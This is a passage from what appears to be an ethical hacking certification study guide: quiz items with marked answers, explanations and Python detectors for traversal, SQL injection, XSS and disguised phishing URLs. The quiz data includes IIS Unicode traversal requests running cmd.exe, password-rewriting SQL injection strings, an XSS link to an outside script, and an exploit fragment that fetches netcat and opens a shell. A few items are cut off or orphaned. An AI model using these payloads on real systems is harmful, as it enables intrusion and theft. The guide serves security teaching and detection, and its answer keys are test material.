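        'protocol': proto,
        'src': '.'.join(str(b) for b in src),
        'dst': '.'.join(str(b) for b in dst),
        'checksum': csum,
        'checksum_ok': ip_checksum(raw[:ihl]) == 0,
        'payload_len': total_len - ihl,
    }


def looks_like_protocol_probe(hdr):
    """Heuristic (an assumption of this example, not an nmap rule): a bare
    IP header with no payload carrying a protocol number other than ICMP,
    IGMP, TCP or UDP is what an nmap -sO probe looks like on the wire."""
    return hdr['payload_len'] == 0 and hdr['protocol'] not in (1, 2, 6, 17)


if __name__ == '__main__':
    hdr = parse_ipv4(hexdump_to_bytes(HEXDUMP))
    for key, value in hdr.items():
        print(f'{key:14s} {value}')
    print('protocol probe?', looks_like_protocol_probe(hdr))
```

The zero words after the twentieth byte are not part of the datagram (total length is 20); they are what follows the header in the captured frame.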

7. Study the following log extract and answer the question below.

12/26-07:06:01.155349 128.173.37.135:1443 -> 172.16.1.106:80
TCP TTL:13 TOS:0x40 ID:35491 IpLen:20 DgmLen:493 DF
***AP*** Seq: 0x2BDC107 Ack: 0x1CB9F186 Win: 0x2238 TcpLen: 20
47 45 54 20 2F 6D 73 61 64 63 2F 2E 2E C0 AF 2E  GET /msadc/.....
2E 2F 2E 2E C0 AF 2E 2E 2F 2E 2E C0 AF 2E 2E 2F  ./....../....../
77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32 2F 63  winnt/system32/c
6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 2B 63 3A  md.exe?/c+dir+c:
5C 20 48 54 54 50 2F 31 2E 31 0D 0A 41 63 63 65  \ HTTP/1.1..Acce

Identify the attack.

a. Hexcode Attack
b. Unicode Directory Traversal Attack*
c. Cross Site Scripting

The byte pair C0 AF is an overlong two-byte UTF-8 encoding of "/" (0x2F). IIS applied its ../ check before decoding the path, so the encoded slashes let the request climb out of the web root and execute cmd.exe, which is why the ASCII column shows dots where the slashes are.


12. What is the attacker ultimately trying to achieve as inferred from the log sequence?

a. Extract information from a local directory
b. Change password of user nobody
c. Change the files' Modification, Access and Creation times*
d. Download rootkits and passwords into a new directory

13. How many user ids can you identify in these log entries that the attacker has tampered with?

a. nobody, dns*
b. acmr, dns
c. IUSR_<machine_name>
d. nobody, IUSR_<machine_name>

14. Which tool/utility can help you extract the application layer data from each TCP connection from a log file into separate files?

a. Snort
b. TCPflow*
c. Tcpdump
d. argus

15. Which of the following represents the initial two commands that an IRC client sends to join an IRC network?

a. USER, PASS
b. USER, NICK*
c. LOGIN, USER
d. LOGIN, NICK

16. A ______ is an automated client that is remotely controlled via a network.

a. Probe
b. Autorooter
c. Bot*
d. Zombie

17. _______ is a utility which exploits the nature of white space and allows the user to conceal information in these white spaces.

a. Snow*
b. Image Hide
c. Gif-It-Up
d. NiceText

18. Null sessions are un-authenticated connections (not using a username or password) to an NT or 2000 system. Which TCP and UDP ports must you filter to check null sessions on your network?

a. 137 and 139
b. 139 and 445*
c. 139 and 443
d. 137 and 443

(139 is the NetBIOS session service; 445 is SMB carried directly over TCP without NetBIOS, which Windows 2000 introduced. A null session can be set up over either.)

19. ________ is found in all versions of NTFS and is described as the ability to fork file data into existing files without affecting their functionality, size, or display to traditional file browsing utilities like dir or Windows Explorer.

a. Steganography
b. Merge Streams
c. Alternate Data Streams*
d. NetBIOS vulnerability

20. What vulnerability does the following command take advantage of?

type c:\anyfile.exe > c:\winnt\system32\calc.exe:anyfile.exe

a. HFS
b. ADS*
c. NTFS
d. Backdoor access

21. Jake works as a system administrator at Acme Corp. Jason, an accountant of the firm, befriends him at the canteen and tags along with him on the pretext of appraising him about potential tax benefits. Jason waits for Jake to swipe his access card and follows him through the open door into the secure systems area. How would you describe Jason's behavior within a security context?

a. Smooth Talking
b. Swipe Gating
c. Trailing
d. Tailgating*

22. ________ is a program that appears to perform a desirable and necessary function but (because of unauthorized code within it that is unknown to the user) performs functions unknown (and definitely unwanted) by the user.

a. Virus
b. Keylogger
c. Trojan*
d. Sniffer

23. Which of the following is not considered to be a part of active sniffing?

a. ARP Spoofing
b. MAC Duplicating
c. SMAC Fueling*
d. MAC Flooding

24. ARP poisoning is achieved in ____ steps

a. 3
b. 2*
c. 1
d. 4

25. Ivan is auditing a corporate website. Using Winhex, he alters a cookie as shown below.

Before Alteration: Cookie: lang=en-us; ADMIN=no; y=1; time=10:30GMT;
After Alteration:  Cookie: lang=en-us; ADMIN=yes; y=1; time=12:30GMT;

What attack is being depicted here?

a. Session Hijacking
b. Cookie Stealing
c. Parameter Manipulation*
d. Cross Site Scripting

26. Kevin sends an email invite to Chris to visit a forum for security professionals. Chris clicks on the link in the email message and is taken to a web based bulletin board. Unknown to Chris, certain functions are executed on his local system under his privileges, which allow Kevin access to information used on the BBS. However, no executables are downloaded and run on the local system. What would you term this attack?

a. Phishing
b. Backdoor installation
c. Denial of Service
d. Cross Site Scripting*

27. ______________ is the process of converting something from one representation to the simplest form. It deals with the way in which systems convert data from one form to another.

a. UCS transformation formats
b. Canonicalization*
c. Character Mapping
d. Character Encoding

28. Identify the SQL injection attack from the HTTP requests shown below.

a. http://www.myserver.c0m/search.asp?lname=smith%27%3bupdate%20usertable%20set%20passwd%3d%27hAx0r%27%3b--%00*
b. http://www.myserver.c0m/script.php?mydata=%3cscript%20src=%22http%3a%2f%2fwww.yourserver.c0m%2fbadscript.js%22%3e%3c%2fscript%3e
c. http://host/cgi-bin/bad.cgi?foo=..%fc%80%80%80%80%af../bin/ls%20-al
d. http://www.victim.com/example?accountnumber=67891&creditamount=999999999

Decoded, (a) reads lname=smith';update usertable set passwd='hAx0r';-- followed by a null byte, which closes the string, stacks an UPDATE and comments out the rest of the query. (b) injects a script tag (cross site scripting), (c) is a directory traversal that spells "/" as the overlong six-byte UTF-8 sequence FC 80 80 80 80 AF, and (d) is plain parameter tampering.
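The overlong-encoding trick behind question 7 and the three encoded attacks in question 28 can be told apart mechanically once a request is decoded the way the target decoded it. The following classifier is an added example (not from the study guide): it percent-decodes a request, folds overlong UTF-8 sequences such as C0 AF and FC 80 80 80 80 AF back to the character they encode, and labels what is left. The sample inputs are constructed copies of the request in question 7 and the four URLs in question 28; the regular expressions are deliberately narrow illustrations, not a complete detector.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed copy of the request bytes from the question 7 hex dump (ASCII column dropped).
Q7_HEX = """
47 45 54 20 2F 6D 73 61 64 63 2F 2E 2E C0 AF 2E
2E 2F 2E 2E C0 AF 2E 2E 2F 2E 2E C0 AF 2E 2E 2F
77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 32 2F 63
6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 2B 63 3A
5C 20 48 54 54 50 2F 31 2E 31 0D 0A 41 63 63 65
"""
Q7_REQUEST = bytes.fromhex(''.join(Q7_HEX.split()))

# Constructed copies of the four question 28 URLs.
SAMPLES = {
    'sqli': b'http://www.myserver.c0m/search.asp?lname=smith%27%3bupdate%20usertable'
            b'%20set%20passwd%3d%27hAx0r%27%3b--%00',
    'xss': b'http://www.myserver.c0m/script.php?mydata=%3cscript%20src=%22http%3a%2f%2f'
           b'www.yourserver.c0m%2fbadscript.js%22%3e%3c%2fscript%3e',
    'overlong_traversal': b'http://host/cgi-bin/bad.cgi?foo=..%fc%80%80%80%80%af../bin/ls%20-al',
    'tampering': b'http://www.victim.com/example?accountnumber=67891&creditamount=999999999',
}

# (lead-byte mask, lead-byte marker, continuation bytes, smallest code point that
# length may legitimately encode). 5- and 6-byte forms predate RFC 3629 but were
# accepted by the decoders these attacks targeted.
_LEAD = (
    (0xe0, 0xc0, 1, 0x80),
    (0xf0, 0xe0, 2, 0x800),
    (0xf8, 0xf0, 3, 0x10000),
    (0xfc, 0xf8, 4, 0x200000),
    (0xfe, 0xfc, 5, 0x4000000),
)


def canonicalize(data):
    """Rewrite overlong UTF-8 sequences as the shortest encoding of the same
    code point. Returns (normalized bytes, list of overlong sequences seen)."""
    out, found, i = bytearray(), [], 0
    while i < len(data):
        b = data[i]
        for mask, marker, ncont, minimum in _LEAD:
            if b & mask != marker:
                continue
            seq = data[i:i + 1 + ncont]
            if len(seq) == 1 + ncont and all(c & 0xc0 == 0x80 for c in seq[1:]):
                cp = b & (0xff >> (ncont + 2))      # payload bits of the lead byte
                for c in seq[1:]:
                    cp = (cp << 6) | (c & 0x3f)
                if cp < minimum and cp <= 0x10ffff:  # overlong: a shorter form exists
                    found.append(bytes(seq))
                    out += chr(cp).encode('utf-8', 'surrogatepass')
                    i += 1 + ncont
                    break
        else:
            out.append(b)        # plain byte, or a well-formed sequence copied as-is
            i += 1
    return bytes(out), found


SQLI_RE = re.compile(rb"'\s*;?\s*(?:update|select|insert|delete|drop|union|or|and)\b", re.I)
XSS_RE = re.compile(rb'<\s*script\b|javascript:|\bon\w+\s*=', re.I)
EXEC_RE = re.compile(rb'cmd\.exe|/bin/(?:sh|ls|cat)', re.I)


def classify(raw):
    """Decode a raw request line or URL the way a lenient server would and
    return (set of labels, decoded bytes)."""
    decoded = unquote_to_bytes(raw)              # one pass of %xx decoding
    decoded, overlong = canonicalize(decoded)
    labels = set()
    if overlong:
        labels.add('overlong-utf8')
    if b'\x00' in decoded:
        labels.add('null-byte')
    if b'../' in decoded or b'..\\' in decoded:
        labels.add('directory-traversal')
    if EXEC_RE.search(decoded):
        labels.add('command-execution')
    if SQLI_RE.search(decoded):
        labels.add('sql-injection')
    if XSS_RE.search(decoded):
        labels.add('xss')
    return labels, decoded


if __name__ == '__main__':
    for name, raw in [('q7', Q7_REQUEST)] + list(SAMPLES.items()):
        labels, decoded = classify(raw)
        print(f'{name:20s} {sorted(labels)}  {decoded[:60]!r}')
```

The order matters: canonicalization runs after percent-decoding, because the overlong bytes in (c) only exist once the %fc%80... escapes have been turned into bytes, whereas in the question 7 request they arrived raw on the wire.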

29. ___________ ensures that the enforcement of organizational security policy does not rely on voluntary web application user compliance. It secures information by assigning sensitivity labels on information and comparing this to the level of sensitivity a user is operating at.

a. Discretionary Access Control
b. Mandatory Access Control*
c. Role-based Access Control
d. Authorized Access Control

30. Kevin has been asked to write a short program to gather user input for a web application. He likes to keep his code neat and simple. He chooses to use printf(str) where he should have ideally used printf("%s", str). What attack will his program expose the web application to?

a. Cross Site Scripting
b. Format String Attack*
c. Unicode Traversal Attack
d. SQL injection Attack

31. StackGuard (as used by Immunix), ssp/ProPolice (as used by OpenBSD), and Microsoft's /GS option use a _________ defense against buffer overflow attacks.

a. Hex editing
b. Format checking
c. Canary*
d. Non-executing stack

32. How will you differentiate between SSL and S-HTTP?

a. SSL operates at the transport layer and S-HTTP operates at the application layer*
b. SSL operates at the network layer and S-HTTP operates at the application layer
c. SSL operates at the application layer and S-HTTP operates at the network layer
d. SSL operates at the application layer and S-HTTP operates at the transport layer

33. _____________ is a type of symmetric-key encryption algorithm that transforms a fixed-length block of plaintext (unencrypted text) data into a block of ciphertext (encrypted text) data of the same length.

a. Stream Cipher
b. Bit Cipher
c. Block Cipher*
d. Hash Cipher

34. ________________ is any process through which one proves and verifies certain information.

a. Identification
b. Verification
c. Enumeration
d. Authentication*


John has a proxy server on his network which caches and filters web access. He has shut down all unnecessary ports and services. Additionally, he has installed a firewall (Cisco PIX) that will not allow users to connect to any outbound ports. Jack, a network user, has successfully connected to a remote server on port 80 using netcat. He could in turn drop a shell from the remote machine.

Q1 John wants to harden his network such that a remote user does not do the same to his network. Choose the option that can be easily and more effectively implemented.

a. Do not use a proxy as the application layer does not provide adequate protection
b. Limit HTTP CONNECT on the network*
c. Sniff the traffic and look for lengthy connection periods
d. Filter port 80

Q2 Assuming an attacker wants to penetrate John's network, which of the following options is he likely to choose?

a. Use a reverse shell using the FTP protocol
b. Use HTTPTunnel or Stunnel on ports 80 and 443*
c. Use Monkey shell
d. Use ClosedVPN

Derek has stumbled upon a wireless network and wants to assess its security. However, he does not find enough traffic for a good capture. He intends to use AirSnort on the captured traffic to crack the WEP key and does not know the IP address range or the AP.

Q4 How can he generate traffic on the network so that he can capture enough packets to crack the WEP key?

a. Derek can use a session replay on the packets captured
b. Derek can use KisMAC as it needs two USB devices to generate traffic
c. Use Ettercap to discover the gateway and an ICMP ping flood tool to generate traffic*
d. Use any ARP requests found in the capture

Q5 Why does Derek need to capture five to ten million packets in order to crack WEP with AirSnort?

a. AirSnort implements the FMS attack and only encrypted packets are counted*
b. All IVs are vulnerable to attack
c. A majority of weak IVs transmitted by access points and wireless cards are not filtered by contemporary wireless manufacturers
d. AirSnort uses a cache of packets


Q6 Derek would like your advice on using a tool that can save him time and get him better results with fewer packets. You would like to recommend a tool that uses KoreK's implementation. Which tool would you recommend from the list below?

a. John the Ripper
b. Shmoo
c. Aircrack*
d. Kismet

Q7 Derek re-injects a captured packet back onto the network. He does this hundreds of times within a second. The packet is correctly encrypted and Derek assumes it is an ARP request packet. The wireless host responds with a stream of responses, all individually encrypted with different IVs. What is this attack most appropriately called?

a. Injection attack
b. Replay attack*
c. Spoof attack
d. Rebound attack

Q8 Derek discovers that the wireless AP transmits 128 bytes of plaintext, and the station responds by encrypting the plaintext. It then transmits the resulting ciphertext using the same key and cipher that are used by WEP to encrypt subsequent network traffic. What authentication mechanism is being followed here?

a. no authentication
b. open system authentication
c. shared key authentication*
d. single key authentication

Your system has been compromised. From the logs available, you notice certain commands. You try to reconstruct the events from the entries available. You suspect that the attacker has exploited the Unicode vulnerability.

Q9 As inferred from the following entry, what is the attacker attempting to do?

GET/…/…À/winnt/system32/cmd.exe?/c+copy+C:\winnt\system32\cmd.exe+cmd1.exe HTTP/1.1

a. Copy cmd.exe to the directory the hacker will work from*
b. Replace the original cmd.exe on the compromised machine
c. Rename cmd.exe to cmd1.exe in order to deface the webpage
d. Drop a shell from the remote computer


Q10 As inferred from the following entry, which of the following statements describes the attacker's effort?

cmd /c C:\Program Files\Common Files\system\...\pdump.exe >> C:\mine.txt

a. Enumerate users and passwords with Password Dump
b. Copy pdump.exe and rename it to mine.txt
c. Execute pdump.exe and save its output into mine.txt*
d. Copy mine.txt into the directory where pdump.exe resides

What is the hacker really trying to steal?

a. har.txt
b. SAM file*
c. Repair file
d. Exploits

Q16 Liza has forgotten her password to an online book shelf. The web application asks her to key in her email so that they can send her the password. Liza enters her email address with a stray trailing single quote ([email protected]'). The application displays a server error. What is wrong with the web application?

a. The web server may be down
b. The email is not valid
c. The ISP connection is not reliable
d. User input is not sanitized*

Q17 Bryan notices the error on the web page and asks Liza to enter liza' or '1'='1 in the email field. They are greeted with the message "Your login information has been mailed to [email protected]". What do you think has occurred?

a. The web application returned the first record it found*
b. The web application picked up a record at random
c. The web application emailed the administrator about the error
d. The server error has caused the application to malfunction

Q18 Bryan is convinced that the web application is vulnerable to SQL injection. He knows that the injection is successful if he receives a response indicating that the login information has been mailed to a user. He inputs [email protected]' AND passwd = 'janedoe. The application informs him that the login information has been mailed to [email protected]. However, Bryan is not concerned about John Doe being tipped off. What could be the reason behind this?

a. John wouldn't consider the mail seriously as he has not asked for it
b. John would not be able to login anyway
c. Bryan has John's password and can use it immediately*
d. Bryan can view John's account details and re-login anytime

The appended AND clause turns the lookup into a password oracle: the confirmation message appears only when the guessed password matches the stored one, so the mail going out is itself the signal that janedoe is the right password.

Q19 Bryan inserts the following into the email field.

x'; UPDATE members SET email = '[email protected]' WHERE email = '[email protected]

What do you think this would result in?

a. Web application responds "This is not a valid email id"
b. Web application responds "Your login information has been mailed to [email protected]"*
c. Web application responds "Your login information has been mailed to [email protected]"
d. Web application responds "Server error"

Q20 Dave has been assigned to test the network security of Acme Corp. The test was announced to the employees. He created a webpage to discuss the progress of the tests with employees who were interested in following the test. Visitors were allowed to click on a sand clock to mark the progress of the test. Dave successfully embeds a keylogger. He also added some statistics on the webpage. The firewall protects the network well and allows strict Internet access. How was security compromised and how did the firewall respond?

a. The attack did not fall through as the firewall blocked traffic
b. The attack was social engineering and the firewall did not detect it*
c. Security was not compromised as the webpage was hosted internally
d. The attack was deception and security was not directly compromised

Q21 What is the most common vehicle for social engineering attacks?

a. Peer to Peer networks
b. Local Area Networks
c. Email
d. Direct in person*

Q22 Oregon Corp is fighting a litigation suit with Scamster Inc. Oregon has assigned a private investigative agency to go through garbage, recycled paper, and other rubbish at Scamster's office site in order to find relevant information. What would you call this kind of activity?

a. CI Gathering
b. Scanning
c. Dumpster Diving*
d. Garbage Scooping

Q23 Sabotage, Advertising and Covering are the three stages of ______________

a. Social engineering
b. Reverse Social Engineering*
c. Reverse Software Engineering
d. Rapid Development Engineering

Q24 Which of the following attacks takes best advantage of an existing authenticated connection?

a. Password Sniffing
b. Spoofing
c. Session Hijacking*
d. Password Guessing

Q25 ________________ is the extraction of user names, machine names, network resources, shares and services.

a. Sniffing
b. Enumeration*
c. Scanning
d. Cracking

Q26 ________________ is the process of mapping out the tables on the database.

a. Database Fingerprinting*
b. Database Scanning
c. Database Enumeration
d. Database Injection

Q27 What is the expected result of the following exploit?

#################################################################
$port = 53;                  # Spawn cmd.exe on port X
$your = "192.168.1.1";       # Your FTP Server
$user = "Anonymous";         # login as
$pass = '[email protected]';  # password
#################################################################
$host = $ARGV[0];
print "Starting ...\n";
print "Server will download the file nc.exe from $your FTP server.\n";

a. Opens up a telnet listener that requires no username or password*
b. Creates an FTP server with write permissions enabled
c. Creates a share called "sasfile" on the target system
d. Creates an account with a username of Anonymous and a password of [email protected]

The variables say what the exploit does: the target is made to fetch nc.exe from the attacker's FTP server using the anonymous login ($user and $pass are the credentials the target presents to that server, not an account created on the target), and netcat then spawns cmd.exe listening on port 53, so anyone who connects to that port gets a shell without authenticating.

Q28 Acme Inc has recently introduced a search feature on its website for its range of washing machines. Dan entered <script>alert('You have just won a washing machine')</script>. When he presses the search button, a pop up box appears on his screen with the text "You have just won a washing machine". What is Acme Inc's website vulnerable to?

a. Cookie Poisoning
b. Session Hijacking
c. Cross Site Scripting*
d. Web server hacking

Q29 You want to carry out session hijacking on a remote server. The server and the client are communicating via TCP after a successful TCP three way handshake. The server has just received packet #155 from the client. The client has a receive window of 230 and the server has a receive window of 280. Within what range of sequence numbers should a packet sent by the client fall in order to be accepted by the server?

a. 200-280
b. 156-436*
c. 155-435
d. 155-231
e. 155-530

The server has consumed 155, so the next sequence number it expects is 156, and it is the server's own receive window (280), not the client's, that bounds how far ahead of that a packet may land and still be queued.

Q31 Jack is testing the perimeter security of DMC corp. He has identified a system in the demilitarized zone. Using Hping and nmap, he has verified that the telnet service is running on the machine. To minimize his footprint, he spoofs his IP while attempting to telnet into the network. However, he is still unable to telnet into the network. What do you think is the reason?

a. The demilitarized zone is secured by a firewall
b. Jack cannot successfully use TCP while spoofing his IP*
c. Jack needs to use a tool such as nmap to telnet inside
d. The target system does not reply to telnet even when the service is running

Q32 What is the essential difference between an 'Ethical Hacker' and a 'Cracker'?

a. The ethical hacker does not use the same techniques or skills as a cracker
b. The ethical hacker does it strictly for financial motives unlike a cracker
c. The ethical hacker has authorization from the owner of the target*
d. The ethical hacker is just a cracker who is getting paid

Q33 When a malicious hacker identifies a target and wants to eventually compromise this target, what would be among the first steps that he would perform? Choose one.

a. Cover his tracks by eradicating the log files and audit trails
b. Gain access to the remote computer in order to conceal the venue of attacks
c. Perform a reconnaissance of the remote target for identification of venue of attacks*

c. Jamming*
d. Scooping

Q41 Jack actively supports the parasitic grid movement. The grid is an underground movement to deploy free wireless access zones in metropolitan areas. Jack is part of the group of volunteers deploying, at their own expense, a wireless access point on the outside of their home, or at worst at a window, with the access point connected to the volunteer's PC. What tool can an attacker use to hide his access point among legitimate access points and steal credentials?

a. Dsniff
b. AirSnort
c. Netstumbler
d. Fake AP*

Q42 In a switched network, the traffic flows as shown below:

Step 1: Node A transmits a frame to Node C.
Step 2: The switch will examine this frame and determine what the intended host is. It will then set up a connection between Node A and Node C so that they have a 'private' connection.
Step 3: Node C will receive the frame and will examine the address. After determining that it is the intended host, it will process the frame further.

Which of the following represents attacks that can help an attacker sniff on a switched network?

a. ARP Spoofing, Switch Hijacking, MAC corrupting
b. ARP Spoofing, MAC Flooding, MAC duplicating*
c. Switch Flooding, Switch Tampering, Switch Hijacking
d. MAC Spoofing, Ethernet Flooding, MAC harvesting

Q44 What is the advantage in encrypting the communication between the agent and the monitor in an Intrusion Detection System?

a. Encryption of agent communications will conceal the presence of the agents
b. Alerts are sent to the monitor when a potential intrusion is detected
c. The monitor will know if counterfeit messages are being generated because they will not be encrypted*
d. An intruder could intercept and delete data or alerts and the intrusion can go undetected

Q45 How would you describe a simple yet very effective mechanism for sending and receiving unauthorized information or data between machines without alerting any firewalls and IDSs on a network?

a. Crafted Channel
b. Covert Channel*
c. Deceptive Channel
d. Bounce Channel

Q46 Ron has configured his network to provide strong perimeter security. As part of his network architecture, he has included a host that is fully exposed to attack. The system is on the public side of the demilitarized zone, unprotected by a firewall or filtering router. What would you call such a host?

a. DMZ host
b. DWZ host
c. Honeypot
d. Bastion Host*

Q47 Eric notices repeated probes to port 1080. He learns that the protocol being used is designed to allow a host outside of a firewall to connect transparently and securely through the firewall. He wonders if his firewall has been breached. What would be your inference?

a. Eric has a Wingate package providing FTP redirection on his network
b. Eric's network has been penetrated by a firewall breach
c. Somebody is using SOCKS on the network to communicate through the firewall*
d. The attacker is using the ICMP protocol to have a covert channel

Q48 Basically, there are two approaches to network intrusion detection: signature detection and anomaly detection. The signature detection approach utilizes well-known signatures for network traffic to identify potentially malicious traffic. The anomaly detection approach utilizes a previous history of network traffic to search for patterns that are abnormal, which would indicate an intrusion. How can an attacker disguise his buffer overflow attack signature such that there is a greater probability of his attack going undetected by the IDS?

a. He can use polymorphic shellcode, with a tool such as ADMmutate, to change the signature of his exploit as seen by a network IDS*
b. He can use a dynamic return address to overwrite the correct value in the target machine's computer memory
c. He can use a shellcode that will perform a reverse telnet back to his machine
d. He can chain NOOP instructions into a NOOP "sled" that advances the processor's instruction pointer to a random place of choice

Q49 The following is an entry captured by a network IDS:

EVENT4: [NOOP:X86] (tcp,dp=515,sp=1592)

You are assigned the task of analyzing this entry. You notice the value 0x90, which is the most common NOOP instruction for the Intel processor. You figure that the attacker is attempting a buffer overflow attack. You also notice "/bin/sh" in the ASCII part of the output. As an analyst, what would you conclude about the attack?

a. The attacker is attempting a buffer overflow attack and has succeeded
b. The attacker is attempting an exploit that launches a command-line shell*
c. The attacker is creating a directory on the compromised machine
d. The buffer overflow attack has been neutralized by the IDS

(Destination port 515/tcp is the LPD print spooler. The IDS sees the NOP sled and the shell string in the payload; it cannot tell from that packet alone whether the overflow landed.)

Q50 Most NIDS systems operate in layer 2 of the OSI model. These systems feed raw traffic into a detection engine and rely on pattern matching and/or statistical analysis to determine what is malicious. Packets are not processed by the host's TCP/IP stack, allowing the NIDS to analyze traffic the host would otherwise discard. Which of the following tools allows an attacker to intentionally craft packets to confuse pattern-matching NIDS systems, while still being correctly assembled by the host TCP/IP stack to render the attack payload?

a. Tcpdump
b. Tcpfrag
c. Defrag
d. Fragroute*

Q51 How would you describe an attack where an attacker attempts to deliver the payload over multiple packets over long periods of time with the purpose of defeating simple pattern matching in IDS systems without session reconstruction? A characteristic of this attack would be a continuous stream of small packets.

a. Session Hijacking
b. Session Stealing
c. Session Splicing*
d. Session Fragmentation

Q52 Why would an attacker want to perform a scan on port 137?

a. To disrupt the NetBIOS SMB service on the target host
b. To check for file and print sharing on Windows systems
c. To discover proxy servers on a network
d. To discover information about a target host using NBTSTAT*

Q53 Bob wants to prevent attackers from sniffing his passwords on the wired network. Which of the following lists the best options?

a. Kerberos, Smart card, Stanford SRP*
b. SMB, SMTP, Smart card
c. RSA, LSA, POP
d. SSID, WEP, Kerberos

Q54 Derek transmits an ARP request to a non-broadcast address. He gets a response from a machine on the network with its IP address. What must Derek infer?

a. The machine has been trojaned by an attacker
b. The machine is running a sniffer in promiscuous mode*
c. The machine is configured with a local address loop
d. His system has its ARP cached and is looping back into the network

Q55 You receive an e-mail with the following message:

Hello Jim,
As part of our annual technical maintenance, we are backing up all data to our data center in Phoenix. To protect your confidential information, we need you to reset your password by logging onto our site at
http://[email protected]/resetpass/logon.htm
If you do not reset your password within 24 hours, your online banking facilities will be suspended.
Sincerely,
Technical Support
Citibank Group

From this e-mail you suspect that this message was sent by some hacker, since you have been reading much about phishing and suspect this could be a scam. You also observe the URL in the message and confirm your suspicion about 0xde.0xad.0xbe.0xef, which looks like hexadecimal numbers. You immediately enter the following at the Windows 2000 command prompt:

ping 0xde.0xad.0xbe.0xef

You get a response with a valid IP address. What is the obstructed IP address in the e-mail URL?

a. 222.173.190.239*
b. 233.34.45.64
c. 54.23.56.55
d. 199.223.23.45

(0xde = 222, 0xad = 173, 0xbe = 190, 0xef = 239. Whatever precedes the @ in the authority part of a URL is user information that the browser discards, which is how the bank's name is made to appear in the link.)


Q56 You receive an e-mail with the following message:

Hello Steve,
We are having technical difficulty in restoring user database records after the recent blackout. Your account data is corrupted. Please logon on to SuperEmailServices.com and change your password.
http://www.superemailservices.com%40c3405906949/support/logon.htm
If you do not reset your password within 7 days, your account will be permanently disabled, locking you out from using our e-mail services.
Sincerely,
Technical Support
SuperEmailServices

From this e-mail you suspect that this message was sent by some hacker, since you have been using their e-mail services for the last 2 years and they never sent out an e-mail such as this. You also observe the URL in the message and confirm your suspicion about 3405906949, which looks like a base-10 number. You immediately enter the following at the Windows 2000 command prompt:

ping 3405906949

You get a response with a valid IP address. What is the obstructed IP address in the e-mail URL?

a. 192.34.5.9
b. 10.0.3.4
c. 203.2.4.5*
d. 199.23.43.4

(3405906949 = 203·2^24 + 2·2^16 + 4·2^8 + 5. The %40 is a percent-encoded @, so everything before it is again user information rather than the host.)
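Q55 and Q56 rely on two URL tricks: everything before the last @ in the authority is user information the browser discards, and the host can be written as hex octets, octal octets or one 32-bit number. The following decoder is an added example (not from the study guide). Its URLs are constructed: the bank lookalike uses the .example domain, and the second URL carries the bare number 3405906949, since the stray letter before it in the page's copy of the link is not part of the value the question pings.

```python
import re
from urllib.parse import unquote, urlsplit


def _octet(text):
    """One dotted-quad component in decimal, 0x hex or leading-zero octal."""
    if re.fullmatch(r'0[xX][0-9a-fA-F]+', text):
        return int(text, 16)
    if re.fullmatch(r'0[0-7]+', text):
        return int(text, 8)
    if re.fullmatch(r'\d+', text):
        return int(text, 10)
    raise ValueError(text)


def decode_host(host):
    """Return (dotted-decimal host, was_obfuscated). Names that are not
    numeric addresses come back unchanged."""
    if re.fullmatch(r'0[xX][0-9a-fA-F]+|\d+', host):          # one 32-bit number
        n = int(host, 16) if host[:2].lower() == '0x' else int(host, 10)
        if n > 0xffffffff:
            raise ValueError('not a 32-bit address: ' + host)
        return '.'.join(str((n >> s) & 0xff) for s in (24, 16, 8, 0)), True
    parts = host.split('.')
    if len(parts) == 4:
        try:
            octets = [_octet(p) for p in parts]
        except ValueError:
            return host, False                                  # a real hostname
        if all(0 <= o <= 255 for o in octets):
            dotted = '.'.join(str(o) for o in octets)
            return dotted, dotted != host
    return host, False


def analyze_url(url):
    """The host a browser really connects to, plus the tricks used to hide it."""
    reasons = []
    netloc = urlsplit(url).netloc
    if '%40' in netloc:               # encoded '@' that lenient browsers decoded
        netloc = unquote(netloc)
        reasons.append('encoded-userinfo-separator')
    if '@' in netloc:
        netloc = netloc.rsplit('@', 1)[1]   # user information is not the host
        reasons.append('userinfo-lookalike')
    host = netloc.split(':', 1)[0]          # drop any port
    host, obfuscated = decode_host(host)
    if obfuscated:
        reasons.append('numeric-host-encoding')
    return host, reasons


# Constructed sample links modelled on the two phishing mails.
SAMPLE_URLS = [
    'http://www.citibank.example@0xde.0xad.0xbe.0xef/resetpass/logon.htm',
    'http://www.superemailservices.com%403405906949/support/logon.htm',
    'http://0336.0255.0276.0357/',
    'http://0xdeadbeef/',
    'https://www.example.com/login',
]

if __name__ == '__main__':
    for url in SAMPLE_URLS:
        host, reasons = analyze_url(url)
        print(f'{host:18s} {reasons}  <- {url}')
```

Anything with a non-empty reasons list deserves the suspicion the questions describe; a plain `ping` of the host part gives the same dotted-decimal answer, but the decoder also tells you which trick was used.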

Q57 Neil notices that a single address is generating traffic from its port 500 to port 500 of several other machines on the network. This scan is eating up most of the network bandwidth and Neil is concerned. As a security professional, what would you infer from this scan?

a. It is a worm that is malfunctioning or hardcoded to scan on port 500
b. The attacker is trying to determine the type of VPN implementation and checking for IPSec*
c. The attacker is trying to detect machines on the network which have SSL enabled
d. It is a network fault and the originating machine is in a network loop

(UDP 500 is ISAKMP/IKE, the key-exchange port of IPsec VPNs, and IKE normally uses 500 as both source and destination port.)

Q58 Erik notices a big increase in UDP packets sent to ports 1026 and 1027 occasionally. He enters the following at the command prompt.

$ nc -l -p 1026 -u -v

In response, he sees the following message.

(?(c)???漿?STOPALERT77STOP! WINDOWS REQUIRES IMMEDIATE ATTENTION.
Windows has found 47 Critical Errors.
To fix the errors please do the following:
1. Download Registry Repair from: www.reg-patch.com
2. Install Registry Repair
3. Run Registry Repair
4. Reboot your computer
FAILURE TO ACT NOW MAY LEAD TO DATA LOSS AND CORRUPTION!

What would you infer from this alert?

a. It is messenger spam. Windows creates a listener on one of the low dynamic ports from 1026 to 1029 and the message usually promotes malware disguised as legitimate utilities*
b. It is a genuine fault of the Windows registry and the registry needs to be backed up
c. An attacker has compromised the machine and backdoored ports 1026 and 1027
d. The machine is redirecting traffic to www.reg-patch.com using adware

==========================================================

While attempting to discover the remote operating system on the target computer, you receive the following results from an nmap scan:

Starting nmap V. 3.10ALPHA9 ( www.insecure.org/nmap/ )
Interesting ports on 172.121.12.222:
(The 1592 ports scanned but not shown below are in state: filtered)
Port       State   Service
21/tcp     open    ftp
25/tcp     open    smtp
53/tcp     closed  domain
80/tcp     open    http
443/tcp    open    https
Remote operating system guess: Too many signatures match to reliably guess the OS.
